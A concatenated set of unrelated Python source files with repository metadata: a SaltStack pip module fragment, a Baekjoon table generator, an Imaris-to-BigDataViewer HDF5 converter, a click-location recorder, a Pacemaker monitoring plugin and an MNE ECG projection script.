download
Download packages into ``download`` instead of installing them
download_cache
Cache downloaded packages in ``download_cache`` dir
source
Check out ``editable`` packages into ``source`` dir
upgrade
Upgrade all packages to the newest available version
force_reinstall
When upgrading, reinstall all packages even if they are already up-to-date.
ignore_installed
Ignore the installed packages (reinstalling instead)
no_deps
Ignore package dependencies
no_install
Download and unpack all packages, but don't actually install them
no_download
Don't download any packages, just install the ones
already downloaded (completes an install run with
--no-install)
install_options
Extra arguments to be supplied to the setup.py install
command (use like --install-option="--install-
scripts=/usr/local/bin"). Use multiple --install-
option options to pass multiple options to setup.py
install. If you are using an option with a directory
path, be sure to use absolute path.
runas
User to run pip as
cwd
Current working directory to run pip from
CLI Example::
salt '*' pip.install <package name>,<package2 name>
salt '*' pip.install requirements=/path/to/requirements.txt
salt '*' pip.install <package name> bin_env=/path/to/virtualenv
salt '*' pip.install <package name> bin_env=/path/to/pip_bin
Comlicated CLI example::
salt '*' pip.install markdown,django editable=git+https://github.com/worldcompany/djangoembed.git#egg=djangoembed upgrade=True no_deps=True
'''
# Switching from using `pip_bin` and `env` to just `bin_env`
# cause using an env and a pip bin that's not in the env could
# be problematic.
# Still using the `env` variable, for backwards compatiblity sake
# but going fwd you should specify either a pip bin or an env with
# the `bin_env` argument and we'll take care of the rest.
if env and not bin_env:
bin_env = env
cmd = '{0} install'.format(_get_pip_bin(bin_env))
if pkgs:
pkg = pkgs.replace(",", " ")
cmd = '{cmd} {pkg} '.format(
cmd=cmd, pkg=pkg)
treq = None
if requirements:
if requirements.startswith('salt://'):
req = __salt__['cp.cache_file'](requirements)
fd_, treq = tempfile.mkstemp()
os.close(fd_)
shutil.copyfile(req, treq)
else:
treq = requirements
cmd = '{cmd} --requirement "{requirements}" '.format(
cmd=cmd, requirements=treq or requirements)
if treq is not None and runas:
logger.debug(
'Changing ownership of requirements file \'{0}\' to '
'user \'{1}\''.format(treq, runas)
)
__salt__['file.chown'](treq, runas, None)
if log:
try:
# TODO make this check if writeable
os.path.exists(log)
except IOError:
raise IOError('\'{0}\' is not writeable'.format(log))
cmd = '{cmd} --log {log} '.format(
cmd=cmd, log=log)
if proxy:
cmd = '{cmd} --proxy={proxy} '.format(
cmd=cmd, proxy=proxy)
if timeout:
try:
int(timeout)
except ValueError:
raise ValueError(
'\'{0}\' is not a valid integer base 10.'.format(timeout)
)
cmd = '{cmd} --timeout={timeout} '.format(
cmd=cmd, timeout=timeout)
if editable:
if editable.find('egg') == -1:
raise Exception('You must specify an egg for this editable')
cmd = '{cmd} --editable={editable} '.format(
cmd=cmd, editable=editable)
if find_links:
if not find_links.startswith("http://"):
raise Exception('\'{0}\' must be a valid url'.format(find_links))
cmd = '{cmd} --find-links={find_links}'.format(
cmd=cmd, find_links=find_links)
if index_url:
if not index_url.startswith("http://"):
raise Exception('\'{0}\' must be a valid url'.format(index_url))
cmd = '{cmd} --index-url="{index_url}" '.format(
cmd=cmd, index_url=index_url)
if extra_index_url:
if not extra_index_url.startswith("http://"):
raise Exception(
'\'{0}\' must be a valid url'.format(extra_index_url)
)
cmd = '{cmd} --extra-index_url="{extra_index_url}" '.format(
cmd=cmd, extra_index_url=extra_index_url)
if no_index:
cmd = '{cmd} --no-index '.format(cmd=cmd)
if mirrors:
if not mirrors.startswith("http://"):
raise Exception('\'{0}\' must be a valid url'.format(mirrors))
cmd = '{cmd} --use-mirrors --mirrors={mirrors} '.format(
cmd=cmd, mirrors=mirrors)
if build:
cmd = '{cmd} --build={build} '.format(
cmd=cmd, build=build)
if target:
cmd = '{cmd} --target={target} '.format(
cmd=cmd, target=target)
if download:
cmd = '{cmd} --download={download} '.format(
cmd=cmd, download=download)
if download_cache:
cmd = '{cmd} --download_cache={download_cache} '.format(
cmd=cmd, download_cache=download_cache)
if source:
cmd = '{cmd} --source={source} '.format(
cmd=cmd, source=source)
if upgrade:
cmd = '{cmd} --upgrade '.format(cmd=cmd)
if force_reinstall:
cmd = '{cmd} --force-reinstall '.format(cmd=cmd)
if ignore_installed:
cmd = '{cmd} --ignore-installed '.format(cmd=cmd)
if no_deps:
cmd = '{cmd} --no-deps '.format(cmd=cmd)
if no_install:
cmd = '{cmd} --no-install '.format(cmd=cmd)
if no_download:
cmd = '{cmd} --no-download '.format(cmd=cmd)
if install_options:
cmd = '{cmd} --install-options={install_options} '.format(
cmd=cmd, install_options=install_options)
try:
result = __salt__['cmd.run_all'](cmd, runas=runas, cwd=cwd)
finally:
if treq:
try:
os.remove(treq)
except Exception:
pass
return result
def uninstall(pkgs=None,
requirements=None,
bin_env=None,
log=None,
proxy=None,
timeout=None,
runas=None,
cwd=None):
'''
Uninstall packages with pip
Uninstall packages individually or from a pip requirements file. Uninstall
packages globally or from a virtualenv.
pkgs
comma separated list of packages to install
requirements
path to requirements
bin_env
path to pip bin or path to virtualenv. If doing an uninstall from
the system python and want to use a specific pip bin (pip-2.7,
pip-2.6, etc..) just specify the pip bin you want.
If uninstalling from a virtualenv, just use the path to the virtualenv
(/home/code/path/to/virtualenv/)
log
Log file where a complete (maximum verbosity) record will be kept
proxy
Specify a proxy in the form
user:passwd@proxy.server:port. Note that the
user:password@ is optional and required only if you
are behind an authenticated proxy. If you provide
user@proxy.server:port then you will be prompted for a
password.
timeout
Set the socket timeout (default 15 seconds)
runas
User to run pip as
cwd
Current working directory to run pip from
CLI Example::
salt '*' pip.uninstall <package name>,<package2 name>
salt '*' pip.uninstall requirements=/path/to/requirements.txt
salt '*' pip.uninstall <package name> bin_env=/path/to/virtualenv
salt '*' pip.uninstall <package name> bin_env=/path/to/pip_bin
'''
cmd = '{0} uninstall -y '.format(_get_pip_bin(bin_env))
if pkgs:
pkg = pkgs.replace(",", " ")
cmd = '{cmd} {pkg} '.format(
cmd=cmd, pkg=pkg)
treq = None
if requirements:
if requirements.startswith('salt://'):
req = __salt__['cp.cache_file'](requirements)
fd_, treq = tempfile.mkstemp()
os.close(fd_)
shutil.copyfile(req, treq)
cmd = '{cmd} --requirements "{requirements}" '.format(
cmd=cmd, requirements=treq or requirements)
if log:
try:
# TODO make this check if writeable
os.path.exists(log)
except IOError:
raise IOError('\'{0}\' is not writeable'.format(log))
cmd = '{cmd} --{log} '.format(
cmd=cmd, log=log)
if proxy:
cmd = '{cmd} --proxy={proxy} '.format(
cmd=cmd, proxy=proxy)
if timeout:
try:
int(timeout)
except ValueError:
raise ValueError(
'\'{0}\' is not a valid integer base 10.'.format(timeout)
)
cmd = '{cmd} --timeout={timeout} '.format(
cmd=cmd, timeout=timeout)
result = __salt__['cmd.run_all'](cmd, runas=runas, cwd=cwd)
if treq:
try:
os.remove(treq)
except Exception:
pass
return result
def freeze(bin_env=None,
runas=None,
cwd=None):
'''
Return a list of installed packages either globally or in the specified
virtualenv
bin_env
path to pip bin or path to virtualenv. If doing an uninstall from
the system python and want to use a specific pip bin (pip-2.7,
pip-2.6, etc..) just specify the pip bin you want.
If uninstalling from a virtualenv, just use the path to the virtualenv
(/home/code/path/to/virtualenv/)
runas
User to run pip as
cwd
Current working directory to run pip from
CLI Example::
salt '*' pip.freeze /home/code/path/to/virtualenv/
'''
pip_bin = _get_pip_bin(bin_env)
activate = os.path.join(os.path.dirname(pip_bin), 'activate')
if not os.path.isfile(activate):
raise CommandExecutionError(
"Could not find the path to the virtualenv's 'activate' binary"
)
cmd = 'source {0}; {1} freeze'.format(activate, pip_bin)
result = __salt__['cmd.run_all'](cmd, runas=runas, cwd=cwd)
if result['retcode'] > 0:
raise CommandExecutionError(result['stderr'])
return result['stdout'].split('\n')
def list(prefix='',
bin_env=None,
runas=None,
cwd=None):
'''
Filter list of installed apps from ``freeze`` and check to see if
``prefix`` exists in the list of packages installed.
CLI Example::
salt '*' pip.list salt
'''
packages = {}
cmd = '{0} freeze'.format(_get_pip_bin(bin_env))
result = __salt__['cmd.run_all'](cmd, runas=runas, cwd=cwd)
if result['retcode'] > 0:
raise CommandExecutionError(result['stderr'])
for line in result['stdout'].split('\n'):
if line.startswith('-e'):
line = line.split('-e ')[1]
line, name = line.split('#egg=')
packages[name] = line
elif len(line.split("==")) >= 2:
name = line.split("==")[0]
version = line.split("==")[1]
if prefix:
if line.lower().startswith(prefix.lower()):
packages[name] = version
else:
packages[name] = version
return packages
| 31.27686 | 147 | 0.593605 |
201709cde10677f321898e3ca43a3bb6619c6bd2 | 3,844 | py | Python | make_table.py | LEEAHRI/baekjoon | b4732043f40b52b09b37329072629f80581e02ee | [
"MIT"
] | null | null | null | make_table.py | LEEAHRI/baekjoon | b4732043f40b52b09b37329072629f80581e02ee | [
"MIT"
] | null | null | null | make_table.py | LEEAHRI/baekjoon | b4732043f40b52b09b37329072629f80581e02ee | [
"MIT"
] | 1 | 2021-07-07T05:52:50.000Z | 2021-07-07T05:52:50.000Z | import sys
def checkData(data):
Validate = [ len(i) == 5 for i in data ] # "최소, 최대 2"
result = False in Validate
if result:
print(Validate.index(False))
return result
def urllevel(name):
name, number = name.lower()[:-1], name[-1]
nameDB = [ "bronze", "sliver", "gold", "platinum", "diamond", "ruby"]
nameDB2 = [ "b", "s", "g", "p", "d", "r" ]
LEVEL = 0
if name in nameDB:
LEVEL = nameDB.index(name)
else:
LEVEL = nameDB2.index(name)
url = f"https://static.solved.ac/tier_small/{LEVEL * 5 + 6 - int(number)}.svg"
ret = f"<img height=\"25px\" width=\"25px=\" src=\"{url}\"/>"
return ret
def urlproblem(number, name):
return f"<a href=\"http://boj.kr/{number}\" target=\"_blank\">{name}</a>"
def urlSolution(url):
if url == "":
return ""
return f"<a href=\"{url}\">바로가기</a>"
class DataForm:
def __init__(self):
self.data = { "id": "", "rec": "", "name": "", "level": "", "url": "", "problemID": ""}
def addItem(self, key, value):
if not key in self.data.keys():
return True, "Key error"
self.data[key] = value
return False, ""
def getItem(self, key):
if not key in self.data.keys():
return True, "Key error"
return False, self.data[key]
def __lt__(self, other):
if self.data["rec"] == other.getItem("rec")[1]:
L = int( self.data["level"][74:][:-7])
R = int(other.data["level"][74:][:-7])
return L < R
return self.data["rec"] != ''
def __repr__(self):
ID = self.data["id"]
REC = ":heavy_check_mark:" if self.data["rec"] != '' else " "
NAME = self.data["name"]
LEVEL = self.data["level"]
URL = self.data["url"]
PROBLEMID = self.data["problemID"]
PRINT_STR = f"| {ID:02} | {REC:^20} | {PROBLEMID:^7} | {NAME:^20} | {LEVEL:^15} | {URL:^20} |"
return PRINT_STR
class Table:
title = [ "순번", "추천 문제", "문제 번호", "문제 이름", "난이도", "풀이 링크" ]
keys = [ "id", "rec", "problemID", "name", "level", "url" ]
def __init__(self):
self.Lines = list()
def makeForm(self, data):
# NULL | Not NULL | Not NULL | Not NULL | Not NULL
ret = dict()
ret[self.keys[1]] = data[0]
ret[self.keys[2]] = urlproblem(data[2], data[2])
ret[self.keys[3]] = urlproblem(data[2], data[1])
ret[self.keys[4]] = urllevel(data[3])
ret[self.keys[5]] = urlSolution(data[4])
return ret
def putLine(self, data):
if not type(data) == dict:
return True, "Type Error"
newData = DataForm()
for k, v in data.items():
newData.addItem(k, v)
self.Lines.append(newData)
def sort(self):
self.Lines = sorted(self.Lines)
N = len(self.Lines)
for i in range(N):
self.Lines[i].addItem("id", i)
def print(self):
A,B,C,D,E,F = self.title
print(f"| {A:^20} | {B:^20} | {C:^20} | {D:^20} | {E:^20} | {F:^20} |")
print(f"| :-----: | :-----: | :-----: | :-----: | :-----: | :-----: |")
N = len(self.Lines)
for i in range(N):
print(self.Lines[i])
if __name__=="__main__":
Input = sys.stdin.readlines()
data = list()
# V,N,PN,L,S
for i in Input:
Line = list(map(str, i.strip().split(",")))
NAME = ','.join(Line[:-3][1:])
Line = Line[:1] + [ NAME ] + Line[-3:]
data.append(Line)
# data = [ list(map(str, i.strip().split(","))) for i in Input ]
# Check Data
assert(not checkData(data))
outputTable = Table()
for i in data:
curLine = outputTable.makeForm(i)
outputTable.putLine(curLine)
outputTable.sort()
outputTable.print()
| 29.569231 | 102 | 0.502862 |
c37ee4d0134da1282567998cfea137d3c1ead503 | 7,213 | py | Python | imarispy/bdv.py | tlambert03/imarispy | 6e5e1228c11a8ae6df478070a9790e2d95888abc | [
"MIT"
] | 9 | 2018-05-31T12:01:56.000Z | 2020-03-23T13:11:29.000Z | imarispy/bdv.py | tlambert03/imarispy | 6e5e1228c11a8ae6df478070a9790e2d95888abc | [
"MIT"
] | 3 | 2018-05-30T21:12:47.000Z | 2020-08-19T20:53:06.000Z | imarispy/bdv.py | tlambert03/imarispy | 6e5e1228c11a8ae6df478070a9790e2d95888abc | [
"MIT"
] | 4 | 2018-09-21T02:11:13.000Z | 2020-08-11T12:39:22.000Z | import os
import h5py
import numpy as np
from xml.etree import ElementTree as ET
from .util import subsample_data
def np_to_bdv(array,
fname='myfile',
subsamp=((1, 1, 1), (1, 2, 2)),
chunks=((4, 32, 32), (16, 16, 16)),
compression='gzip'
):
assert len(subsamp) == len(chunks)
assert all([len(i) == 3 for i in subsamp]), 'Only deal with 3D chunks'
assert all([len(i) == len(x) for i, x in zip(subsamp, chunks)])
assert compression in (None, 'gzip', 'lzf', 'szip'), 'Unknown compression type'
fname = os.path.splitext(fname)[0] + '.h5'
# force 5D
# TODO: configure/rearrange axes
# for now... assume TCZYX axis order
if not array.ndim == 5:
array = array.reshape(tuple([1] * (5 - array.ndim)) + array.shape)
nt, nc, nz, ny, nx = array.shape
nr = len(subsamp)
with h5py.File(fname, 'a') as hf:
hf['__DATA_TYPES__/Enum_Boolean'] = np.dtype('bool')
# hf['__DATA_TYPES__/String_VariableLength'] = h5py.special_dtype(vlen=np.dtype('O'))
for c in range(nc):
grp = hf.create_group('s{:02d}'.format(c))
# resolutions and subdivisions require XYZ axis order
grp.create_dataset('resolutions', data=np.fliplr(np.array(subsamp)),
dtype='<f8',
chunks=np.array(subsamp).shape,
maxshape=(None, None))
grp.create_dataset('subdivisions', data=np.fliplr(np.array(chunks)),
dtype='<i4',
chunks=np.array(chunks).shape,
maxshape=(None, None))
fmt = 't{:05d}/s{:02d}/{}'
for t in range(nt):
for c in range(nc):
data = np.squeeze(array[t, c]).astype(np.uint16)
for r in range(nr):
grp = hf.create_group(fmt.format(t, c, r))
subdata = subsample_data(data, subsamp[r])
grp.create_dataset('cells', data=subdata,
chunks=chunks[r],
maxshape=(None, None, None),
scaleoffset=0,
compression=compression)
write_bdv_xml(fname, array.shape)
return
def detect_ims_shape(hf):
# will be populated with shape (nt, nc, nz, ny, nx) of dataset
shape = [1, 0, 0, 0, 0]
KEYS = {
'x': 4,
'y': 3,
'z': 2,
'numberofchannels': 1,
'noc': 1,
'datasettimepoints': 0,
'filetimepoints': 0,
}
def visitor(x, y):
for name, value in y.attrs.items():
if name.lower() in KEYS:
shape[KEYS[name.lower()]] = int(value.tostring().decode('ASCII'))
hf.visititems(visitor)
return shape
def map_imaris_names_to_bdv(hf):
""" Takes an Imaris file and creates required links for BDV compatibility"""
shape = detect_ims_shape(hf)
assert all([x > 0 for x in shape[-3:]]), 'Could not detect 3D volume size in HD5 file'
if shape[1] == 0:
shape[1] = len(hf['DataSet/ResolutionLevel 0/TimePoint 0'])
if shape[1] == 0:
while True:
if bool(hf.get('DataSetInfo/Channel {}'.format(shape[1]))):
shape[1] += 1
else:
break
assert shape[1] > 0, 'Could not detect number of channels in HD5 file'
# detect number of resolution levels
nr = 0
while True:
if bool(hf.get('DataSet/ResolutionLevel {}'.format(nr))):
nr += 1
else:
break
# detect subsampling and chunking rates
ress = np.empty((nr, 3))
subs = np.empty_like(ress)
for r in range(nr):
d = hf.get('DataSet/ResolutionLevel {}/TimePoint 0/Channel 0/Data'.format(r))
ress[r] = np.divide(shape[-3:], d.shape).astype(int)
subs[r] = d.chunks
assert d.dtype in (np.uint16, np.int16), 'BDV only supports 16 bit files'
# write BDV-required datasets
for c in range(shape[1]):
grp = hf.require_group('s{:02d}'.format(c))
# resolutions and subdivisions require XYZ axis order
grp.require_dataset('resolutions', ress.shape, data=np.fliplr(ress), dtype='<f8',
chunks=ress.shape, maxshape=(None, None))
grp.require_dataset('subdivisions', subs.shape, data=np.fliplr(subs), dtype='<i4',
chunks=subs.shape, maxshape=(None, None))
# perform dataset linking between Imaris and BDV formats
ims_fmt = '/DataSet/ResolutionLevel {}/TimePoint {}/Channel {}/Data'
bdv_fmt = 't{:05d}/s{:02d}/{}/cells'
for t in range(shape[0]):
for c in range(shape[1]):
for r in range(nr):
if not bdv_fmt.format(t, c, r) in hf:
hf[bdv_fmt.format(t, c, r)] = hf[ims_fmt.format(r, t, c)]
# hf[bdv_fmt.format(t, c, r)] = h5py.SoftLink(ims_fmt.format(r, t, c))
# create the XML file for BDV
write_bdv_xml(hf.filename, shape)
return
def write_bdv_xml(fname, imshape, dx=0.1, dy=0.1, dz=0.25):
nt, nc, nz, ny, nx = tuple(imshape)
root = ET.Element('SpimData')
root.set('version', '0.2')
bp = ET.SubElement(root, 'BasePath')
bp.set('type', 'relative')
bp.text = '.'
seqdesc = ET.SubElement(root, 'SequenceDescription')
imgload = ET.SubElement(seqdesc, 'ImageLoader')
imgload.set('format', 'bdv.hdf5')
el = ET.SubElement(imgload, 'hdf5')
el.set('type', 'relative')
el.text = os.path.basename(fname)
viewsets = ET.SubElement(seqdesc, 'ViewSetups')
attrs = ET.SubElement(viewsets, 'Attributes')
attrs.set('name', 'channel')
for c in range(nc):
vs = ET.SubElement(viewsets, 'ViewSetup')
ET.SubElement(vs, 'id').text = str(c)
ET.SubElement(vs, 'name').text = 'channel {}'.format(c + 1)
ET.SubElement(vs, 'size').text = '{} {} {}'.format(nx, ny, nz)
vox = ET.SubElement(vs, 'voxelSize')
ET.SubElement(vox, 'unit').text = 'micron'
ET.SubElement(vox, 'size').text = '{} {} {}'.format(dx, dy, dz)
a = ET.SubElement(vs, 'attributes')
ET.SubElement(a, 'channel').text = str(c + 1)
chan = ET.SubElement(attrs, 'Channel')
ET.SubElement(chan, 'id').text = str(c + 1)
ET.SubElement(chan, 'name').text = str(c + 1)
tpoints = ET.SubElement(seqdesc, 'Timepoints')
tpoints.set('type', 'range')
ET.SubElement(tpoints, 'first').text = str(0)
ET.SubElement(tpoints, 'last').text = str(nt - 1)
vregs = ET.SubElement(root, 'ViewRegistrations')
for t in range(nt):
for c in range(nc):
vreg = ET.SubElement(vregs, 'ViewRegistration')
vreg.set('timepoint', str(t))
vreg.set('setup', str(c))
vt = ET.SubElement(vreg, 'ViewTransform')
vt.set('type', 'affine')
ET.SubElement(vt, 'affine').text = '{} 0.0 0.0 0.0 0.0 {} 0.0 0.0 0.0 0.0 {} 0.0'.format(dx, dy, dz)
tree = ET.ElementTree(root)
tree.write(os.path.splitext(fname)[0] + ".xml")
| 38.164021 | 112 | 0.549841 |
8940cb423adffcc9edb1d3b0ab37e5196834169a | 1,318 | py | Python | primitives/get_quick_pray_location.py | anordin95/replay_mouse | 569abe771cac3b639317b1ca97c98b0c486a4714 | [
"MIT"
] | null | null | null | primitives/get_quick_pray_location.py | anordin95/replay_mouse | 569abe771cac3b639317b1ca97c98b0c486a4714 | [
"MIT"
] | null | null | null | primitives/get_quick_pray_location.py | anordin95/replay_mouse | 569abe771cac3b639317b1ca97c98b0c486a4714 | [
"MIT"
] | null | null | null | from primitives.click_location import ClickLocation
from pynput import keyboard, mouse
import logging
import pickle
import random
import pyautogui
from functools import partial
import time
quick_pray_location = None
logger = logging.getLogger(__name__)
def on_press(key):
if key == keyboard.Key.esc:
logger.critical("Escape pressed. Done setting up quick pray location.")
# returning False exits the handler.
return False
def on_click(x, y, button, pressed):
'''
listens only for right clicks.
'''
if button != mouse.Button.right or pressed is False:
return
global quick_pray_location
logger.info("Recorded click location.")
quick_pray_location = ClickLocation(x, y, margin_for_error_px=3)
def log_instructions():
logger.info("Right click once on the quick-prayer location.")
logger.info("Press esc, when complete.")
def get_quick_pray_location(filename):
log_instructions()
with keyboard.Listener(on_press=on_press) as keyboard_listener:
with mouse.Listener(on_click=on_click) as mouse_listener:
keyboard_listener.join()
logger.info(f"Captured quick pray location: {quick_pray_location}")
with open(filename, "wb") as f:
pickle.dump(quick_pray_location, f)
logger.info(f"Wrote quick pray location to file: {filename}")
if __name__ == '__main__':
get_quick_pray_location() | 25.843137 | 73 | 0.7739 |
1f758f18f5346233439322bdf35a4dbcc6852c54 | 3,612 | py | Python | playbooks/files/rax-maas/plugins/pacemaker.py | JCallicoat/rpc-maas | 879bab6623339c99c288acf9191b445fe1ea1fa2 | [
"Apache-2.0"
] | 31 | 2015-01-03T10:30:56.000Z | 2019-06-23T22:21:24.000Z | playbooks/files/rax-maas/plugins/pacemaker.py | JCallicoat/rpc-maas | 879bab6623339c99c288acf9191b445fe1ea1fa2 | [
"Apache-2.0"
] | 457 | 2015-01-01T15:58:47.000Z | 2021-06-10T12:04:11.000Z | playbooks/files/rax-maas/plugins/pacemaker.py | JCallicoat/rpc-maas | 879bab6623339c99c288acf9191b445fe1ea1fa2 | [
"Apache-2.0"
] | 65 | 2015-03-02T02:39:59.000Z | 2021-12-22T21:57:01.000Z | #!/usr/bin/env python3
# Copyright 2014, Rackspace US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import re
from maas_common import metric
from maas_common import print_output
from maas_common import status_err
from maas_common import status_ok
from maas_common import MaaSException
class BadOutputError(MaaSException):
pass
def check_command(command, param1, param2=None):
if param2:
output = subprocess.check_output([command, param1, param2])
else:
output = subprocess.check_output([command, param1])
if not output:
status_err('No output received from pacemaker. Cannot gather metrics.')
raise BadOutputError(
'The output was not in the expected format:\n%s' % output)
return output.decode()
# determine nodes status, call "pcs status nodes" command
def get_nodes_status():
output = check_command('pcs', 'status', 'nodes')
lines = output.split('\n')
has_metrics = False
for line in lines:
if line.strip().startswith('Standby') or line.strip().startswith(
'Offline'):
splitline = line.strip().split(': ')
if len(splitline) > 1:
message = "Pacemaker node standby/offline: " + splitline[1]
metric('pacemaker_status_nodes', 'string', message)
has_metrics = True
if not has_metrics:
metric('pacemaker_status_nodes', 'string',
"Pacemaker node status is OK")
# check "pcs status". If there are any failures, warnings, or notices,
# return the whole output.
def check_for_failed_actions():
output = check_command('pcs', 'status')
pattern = re.compile(
"Failed|Stopped|Notice|Fail|Error|Warning|Faulty", flags=re.IGNORECASE)
bad_things_happened = re.search(pattern, output)
if bad_things_happened:
metric('pacemaker_failed_actions', 'string',
'Errors in pacemaker cluster')
else:
metric('pacemaker_failed_actions', 'string', 'Pacemaker cluster is OK')
def check_for_failed_resources():
output = check_command('pcs', 'status', 'resources')
pattern = re.compile(
"Failed|Stopped|Notice|Fail|Error|Warning|Faulty", flags=re.IGNORECASE)
bad_things_happened = re.search(pattern, output)
has_metrics = False
if bad_things_happened:
lines = output.split('\n')
for index in xrange(len(lines)):
if lines[index].strip().startswith('Stopped'):
if lines[index - 1]:
message = "Stopped resource: " + lines[index - 1]
metric('pacemaker_resource_stop', 'string', message)
has_metrics = True
if(has_metrics is False):
metric('pacemaker_resource_stop', 'string',
"Pacemaker resources are OK")
if __name__ == '__main__':
with print_output():
try:
get_nodes_status()
check_for_failed_actions()
check_for_failed_resources()
except Exception as e:
status_err(e)
else:
status_ok()
| 31.684211 | 79 | 0.6567 |
704d58674aa2460c3770832605de99729383ca7a | 8,399 | py | Python | mne/commands/mne_compute_proj_ecg.py | Anevar/mne-python | 15b19ed6b9364ae4787f0df2fd7e689b3c0a30bb | [
"BSD-3-Clause"
] | 2 | 2015-09-27T20:33:49.000Z | 2020-04-22T19:10:56.000Z | mne/commands/mne_compute_proj_ecg.py | Anevar/mne-python | 15b19ed6b9364ae4787f0df2fd7e689b3c0a30bb | [
"BSD-3-Clause"
] | null | null | null | mne/commands/mne_compute_proj_ecg.py | Anevar/mne-python | 15b19ed6b9364ae4787f0df2fd7e689b3c0a30bb | [
"BSD-3-Clause"
] | 1 | 2018-09-15T09:45:38.000Z | 2018-09-15T09:45:38.000Z | #!/usr/bin/env python
"""Compute SSP/PCA projections for ECG artifacts
You can do for example:
$ mne compute_proj_ecg -i sample_audvis_raw.fif -c "MEG 1531" --l-freq 1 --h-freq 100 --rej-grad 3000 --rej-mag 4000 --rej-eeg 100
"""
from __future__ import print_function
# Authors : Alexandre Gramfort, Ph.D.
# Martin Luessi, Ph.D.
from ..externals.six import string_types
import os
import sys
import mne
if __name__ == '__main__':
from mne.commands.utils import get_optparser
parser = get_optparser(__file__)
parser.add_option("-i", "--in", dest="raw_in",
help="Input raw FIF file", metavar="FILE")
parser.add_option("--tmin", dest="tmin", type="float",
help="Time before event in seconds",
default=-0.2)
parser.add_option("--tmax", dest="tmax", type="float",
help="Time after event in seconds",
default=0.4)
parser.add_option("-g", "--n-grad", dest="n_grad", type="int",
help="Number of SSP vectors for gradiometers",
default=2)
parser.add_option("-m", "--n-mag", dest="n_mag", type="int",
help="Number of SSP vectors for magnetometers",
default=2)
parser.add_option("-e", "--n-eeg", dest="n_eeg", type="int",
help="Number of SSP vectors for EEG",
default=2)
parser.add_option("--l-freq", dest="l_freq", type="float",
help="Filter low cut-off frequency in Hz",
default=1)
parser.add_option("--h-freq", dest="h_freq", type="float",
help="Filter high cut-off frequency in Hz",
default=100)
parser.add_option("--ecg-l-freq", dest="ecg_l_freq", type="float",
help="Filter low cut-off frequency in Hz used "
"for ECG event detection",
default=5)
parser.add_option("--ecg-h-freq", dest="ecg_h_freq", type="float",
help="Filter high cut-off frequency in Hz used "
"for ECG event detection",
default=35)
parser.add_option("-p", "--preload", dest="preload",
help="Temporary file used during computation "
"(to save memory)",
default=True)
parser.add_option("-a", "--average", dest="average", action="store_true",
help="Compute SSP after averaging",
default=False)
parser.add_option("--proj", dest="proj",
help="Use SSP projections from a fif file.",
default=None)
parser.add_option("--filtersize", dest="filter_length", type="int",
help="Number of taps to use for filtering",
default=2048)
parser.add_option("-j", "--n-jobs", dest="n_jobs", type="int",
help="Number of jobs to run in parallel",
default=1)
parser.add_option("-c", "--channel", dest="ch_name",
help="Channel to use for ECG detection "
"(Required if no ECG found)",
default=None)
parser.add_option("--rej-grad", dest="rej_grad", type="float",
help="Gradiometers rejection parameter "
"in fT/cm (peak to peak amplitude)",
default=2000)
parser.add_option("--rej-mag", dest="rej_mag", type="float",
help="Magnetometers rejection parameter "
"in fT (peak to peak amplitude)",
default=3000)
parser.add_option("--rej-eeg", dest="rej_eeg", type="float",
help="EEG rejection parameter in uV "
"(peak to peak amplitude)",
default=50)
parser.add_option("--rej-eog", dest="rej_eog", type="float",
help="EOG rejection parameter in uV "
"(peak to peak amplitude)",
default=250)
parser.add_option("--avg-ref", dest="avg_ref", action="store_true",
help="Add EEG average reference proj",
default=False)
parser.add_option("--no-proj", dest="no_proj", action="store_true",
help="Exclude the SSP projectors currently "
"in the fiff file",
default=False)
parser.add_option("--bad", dest="bad_fname",
help="Text file containing bad channels list "
"(one per line)",
default=None)
parser.add_option("--event-id", dest="event_id", type="int",
help="ID to use for events",
default=999)
parser.add_option("--event-raw", dest="raw_event_fname",
help="raw file to use for event detection",
default=None)
parser.add_option("--tstart", dest="tstart", type="float",
help="Start artifact detection after tstart seconds",
default=0.)
parser.add_option("--qrsthr", dest="qrs_threshold", type="string",
help="QRS detection threshold. Between 0 and 1. Can "
"also be 'auto' for automatic selection",
default='auto')
options, args = parser.parse_args()
raw_in = options.raw_in
if raw_in is None:
parser.print_help()
sys.exit(1)
tmin = options.tmin
tmax = options.tmax
n_grad = options.n_grad
n_mag = options.n_mag
n_eeg = options.n_eeg
l_freq = options.l_freq
h_freq = options.h_freq
ecg_l_freq = options.ecg_l_freq
ecg_h_freq = options.ecg_h_freq
average = options.average
preload = options.preload
filter_length = options.filter_length
n_jobs = options.n_jobs
ch_name = options.ch_name
reject = dict(grad=1e-13 * float(options.rej_grad),
mag=1e-15 * float(options.rej_mag),
eeg=1e-6 * float(options.rej_eeg),
eog=1e-6 * float(options.rej_eog))
avg_ref = options.avg_ref
no_proj = options.no_proj
bad_fname = options.bad_fname
event_id = options.event_id
proj_fname = options.proj
raw_event_fname = options.raw_event_fname
tstart = options.tstart
qrs_threshold = options.qrs_threshold
if qrs_threshold != 'auto':
try:
qrs_threshold = float(qrs_threshold)
except ValueError:
raise ValueError('qrsthr must be "auto" or a float')
if bad_fname is not None:
bads = [w.rstrip().split()[0] for w in open(bad_fname).readlines()]
print('Bad channels read : %s' % bads)
else:
bads = []
if raw_in.endswith('_raw.fif') or raw_in.endswith('-raw.fif'):
prefix = raw_in[:-8]
else:
prefix = raw_in[:-4]
ecg_event_fname = prefix + '_ecg-eve.fif'
if average:
ecg_proj_fname = prefix + '_ecg_avg_proj.fif'
else:
ecg_proj_fname = prefix + '_ecg_proj.fif'
raw = mne.fiff.Raw(raw_in, preload=preload)
if raw_event_fname is not None:
raw_event = mne.fiff.Raw(raw_event_fname)
else:
raw_event = raw
flat = None # XXX : not exposed to the user
cpe = mne.preprocessing.compute_proj_ecg
projs, events = cpe(raw, raw_event, tmin, tmax, n_grad, n_mag, n_eeg,
l_freq, h_freq, average, filter_length, n_jobs,
ch_name, reject, flat, bads, avg_ref, no_proj,
event_id, ecg_l_freq, ecg_h_freq, tstart,
qrs_threshold, copy=False)
raw.close()
if raw_event_fname is not None:
raw_event.close()
if proj_fname is not None:
print('Including SSP projections from : %s' % proj_fname)
# append the ecg projs, so they are last in the list
projs = mne.read_proj(proj_fname) + projs
if isinstance(preload, string_types) and os.path.exists(preload):
os.remove(preload)
